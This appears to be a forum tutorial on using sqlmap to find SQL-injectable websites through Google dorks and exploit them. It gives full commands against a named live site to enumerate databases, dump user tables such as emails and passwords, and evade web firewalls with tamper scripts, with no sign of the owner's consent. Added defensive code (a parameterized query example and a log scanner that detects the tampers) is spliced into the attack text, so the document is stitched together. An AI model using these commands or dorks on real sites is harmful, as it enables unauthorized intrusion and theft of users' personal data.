melindad74
Basic tutorial on using sqlmap to exploit a web application vulnerable to SQL injection
Content:
- Sqlmap download and requirements
- Getting an SQLi-vulnerable website
- Exploiting the vulnerability using sqlmap (database, table and column enumeration)
- Dump data from the database
- Bypass firewalls using tamper scripts
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches covering database fingerprinting, fetching data from the database, accessing the underlying file system, and executing commands on the operating system via out-of-band connections.
1- Sqlmap download and requirements:
SQLmap repository: (link hidden in the original post)
Required: python 2.7.*
To get basic sqlmap commands help:
python sqlmap.py -h
2- Getting an SQLi-vulnerable website:
You can search for vulnerable websites using search engines such as Google (the best SE).
You just need to use a good dork (not included in this tutorial).
In this example I used this dork: (inurl:shop.php?id= site:in) and checked websites manually (the best way).
Or just use the dork within sqlmap, which is not recommended:
python sqlmap.py -g "inurl:shop.php?id= site:in" --random-agent
Open a website from the search results and add a quote (') to the end of the URL, then press Enter. If you see error strings like this in the source: "You have an error in your SQL syntax;"
then the web application might be vulnerable. In my example:
[Image: screenshot]
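The error string that the quote probe above relies on comes from a query that splices the id parameter straight into the SQL text. As an added example (not from the original post), using Python's sqlite3 as a constructed stand-in for the shop's database: the unsafe lookup reproduces that symptom when a quote is appended, while the hardened lookup validates the type, binds the value and never returns driver error text to the visitor.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory products table (not the original site's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)",
                     [(11, "widget", 9.99), (12, "gadget", 19.99)])
    return conn


def lookup_unsafe(conn: sqlite3.Connection, id_param: str):
    """The shop.php?id= anti-pattern: the raw parameter becomes part of the SQL string.
    Returns (rows, error_text); error_text is what a careless page echoes to the visitor."""
    try:
        rows = conn.execute("SELECT name, price FROM products WHERE id = " + id_param).fetchall()
        return rows, None
    except sqlite3.Error as exc:
        # SQLite's analogue of MySQL's "You have an error in your SQL syntax": a stray quote
        # breaks the statement, and leaking this text is what tells a scanner it worked.
        return [], str(exc)


def lookup_safe(conn: sqlite3.Connection, id_param: str):
    """Hardened form: reject anything that is not an integer, bind the value as a parameter,
    and answer invalid input with a generic message that reveals nothing about the database."""
    if not id_param.isdigit():
        return [], "invalid product id"
    rows = conn.execute("SELECT name, price FROM products WHERE id = ?", (int(id_param),)).fetchall()
    return rows, None
```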
3- Exploiting the vulnerability using sqlmap:
Most used sqlmap arguments/commands (recommended):
-u URL, --url=URL Target URL (e.g. "https://www.site.com/vuln.php?id=1")
--random-agent Use randomly selected HTTP User-Agent header value
--proxy=PROXY Use a proxy to connect to the target URL
--dbms=DBMS Force back-end DBMS to provided value (ex: MySQL)
--level=LEVEL Level of tests to perform (1-5, default 1). recommended: 3
--risk=RISK Risk of tests to perform (1-3, default 1). recommended: 3 (note: risk 3 adds OR-based payloads that can modify data when the injection point sits inside an UPDATE statement)
-a, --all Retrieve everything
-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--passwords Enumerate DBMS users password hashes
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--schema Enumerate DBMS schema
--dump Dump DBMS database table entries
--dump-all Dump all DBMS databases tables entries
-D DB DBMS database to enumerate
-T TBL DBMS database table(s) to enumerate
-C COL DBMS database table column(s) to enumerate
--tamper=TAMPER Use given script(s) for tampering injection data
--threads=THREADS Max number of concurrent HTTP(s) requests (default 1)
--timeout=TIMEOUT Seconds to wait before timeout connection (default 30)
a) - Enumerate server databases:
My target for now is: http://www.aarsh.co.in/products.php?id=11
So I run this command:
python sqlmap.py -u http://www.aarsh.co.in/products.php?id=11 --dbms=MySQL --risk=3 --level=3 --random-agent --tamper=randomcomments,randomcase --dbs --is-dba
I already know that the DBMS (database management system) is MySQL, so I add "--dbms=MySQL" to the command line to skip running payloads for other DBMSs and save time. I also set level and risk to 3 for advanced exploiting ("--risk=3 --level=3")... "--random-agent" to use a random user agent... "--dbs" to enumerate the databases of this server/site, if it's vulnerable of course.
"--is-dba" checks whether the current database user has admin privileges or not, and finally "--tamper", which we'll discuss later in this tutorial.
You can use the "--threads" argument to speed up the pentest (depends on your internet connection).
[Image: screenshot]
(
I couldn't complete the previous step (exploiting) because of some technical problem.
I may edit this tutorial later...
But the rest is easy.
)
b) - Enumerate database tables:
python sqlmap.py -u http://www.aarsh.co.in/products.php?id=11 --dbms=MySQL --risk=3 --level=3 --random-agent --tamper=randomcomments,randomcase -D "db_name" --tables
c) - Enumerate table columns:
At the end of the table enumeration results, your targeted table names should look like: users, members, subscribers...
In the final step, column enumeration, you may look for emails, passwords, usernames...
So type the command as below (-D "db_name" -T "table_name" --columns) to enumerate the table columns:
python sqlmap.py -u http://www.aarsh.co.in/products.php?id=11 --dbms=MySQL --risk=3 --level=3 --random-agent --tamper=randomcomments,randomcase -D "db_name" -T "tb_name" --columns
4- Dump data from database:
Finally it is time to fetch data from the database.
Command: -D "db_name" -T "table_name" -C "column1,column2,column3..." --dump
You can select any column from the table, and you may use threads to make the dump faster (--threads=10).
python sqlmap.py -u http://www.aarsh.co.in/products.php?id=11 --dbms=MySQL --risk=3 --level=3 --random-agent --tamper=randomcomments,randomcase -D "db_name" -T "tb_name" -C "column1,column2..." --dump --threads=5
5- Bypass firewalls using tamper scripts:
Tamper scripts are used to obfuscate payloads and evade web application firewalls, because many firewalls inspect SQL queries to defend the web app from database attacks... I usually use these two tampers: (randomcase.py, randomcomments.py), and each firewall may need a special set of tampers, so it depends on the web application. We won't discuss this much because it's for advanced users.
To see the full list of tamper scripts, located in the "tamper" folder within the sqlmap path (you can write your own tamper):
python sqlmap.py --list-tampers
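A normalizing filter is the defender's counterpart to the two tampers named above: randomcase only changes the letter case of SQL keywords and randomcomments only inserts /**/ inside keywords, so folding case and stripping comments before pattern matching undoes both evasions. As an added example, not part of the original post, this runs such a check over constructed web-server log lines (Apache combined format) and also flags the default sqlmap User-Agent that --random-agent is meant to replace.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines in Apache combined format (sample data, not from the original post).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /products.php?id=11 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [01/Jan/2024:12:00:01 +0000] "GET /products.php?id=11%27 HTTP/1.1" 500 120 "-" "sqlmap/1.7 (https://sqlmap.org)"',
    '10.0.0.7 - - [01/Jan/2024:12:00:02 +0000] "GET /products.php?id=11%20uNi/**/On%20sEl/**/EcT%201,2,3 HTTP/1.1" 200 900 "-" "Mozilla/5.0 (X11)"',
    '10.0.0.9 - - [01/Jan/2024:12:00:03 +0000] "GET /products.php?id=12 HTTP/1.1" 200 510 "-" "Mozilla/5.0"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Matched against the normalized value, i.e. after the case and comment tricks are undone.
SQLI_PATTERNS = [
    (re.compile(r"'"), "single quote in parameter"),
    (re.compile(r"\bunion\b.*\bselect\b"), "union-based select"),
]


def normalize(value: str) -> str:
    """Undo what the randomcase and randomcomments tampers rely on."""
    value = unquote(value)  # parse_qsl already decoded once; this catches double encoding
    # randomcomments inserts /**/ inside keywords (IN/**/SERT), so comments are removed, not replaced
    value = re.sub(r"/\*.*?\*/", "", value, flags=re.S)
    return re.sub(r"\s+", " ", value).strip().lower()  # randomcase: fold case; collapse blanks


def inspect_line(line: str) -> list[str]:
    """Return the reasons a log line looks like an SQL injection probe (empty if it looks clean)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable log line"]
    reasons = []
    if m["ua"].lower().startswith("sqlmap"):
        reasons.append("default sqlmap User-Agent")  # --random-agent hides this; the payload checks still fire
    for name, raw in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
        norm = normalize(raw)
        if name == "id" and not norm.isdigit():  # id is expected to be an integer on this page
            reasons.append(f"non-numeric id={norm!r}")
        reasons.extend(label for pat, label in SQLI_PATTERNS if pat.search(norm))
    return reasons


def scan_log(lines) -> dict[str, list[str]]:
    """Map each client IP to every reason seen across its requests."""
    hits: dict[str, list[str]] = {}
    for line in lines:
        reasons = inspect_line(line)
        if reasons:
            hits.setdefault(line.split(" ", 1)[0], []).extend(reasons)
    return hits
```

The same normalization belongs in a WAF rule or log pipeline; the two payload patterns are deliberately minimal and would be extended in practice.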